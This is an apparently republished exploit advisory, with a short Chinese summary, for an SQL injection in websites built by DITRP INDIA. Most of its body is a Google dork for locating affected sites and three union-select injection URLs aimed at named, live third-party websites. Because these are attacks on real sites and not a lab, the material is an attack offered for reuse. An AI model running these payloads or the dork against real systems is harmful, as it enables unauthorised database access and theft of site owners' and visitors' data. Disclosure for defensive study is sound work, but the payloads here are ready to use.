DITRP INDIA公司的网站存在SQL注入漏洞,影响多个站点。攻击者可通过修改URL参数执行SQL查询,获取敏感信息。该漏洞已被研究人员Behrouz Mansoori发现并公开。 2025-8-28 11:20:19 Author: cxsecurity.com(查看原文) 阅读量:14 收藏
DITRP INDIA - Sql Injection
********************************************************* #Exploit Title: DITRP INDIA - Sql Injection #Date: 2025-08-09 #Exploit Author: Behrouz Mansoori #Google Dork: "designed by : DITRP INDIA" #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : https://dishapunjab.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+ https://aarushcomputer.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+ https://www.ishaqcomputers.co.in/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh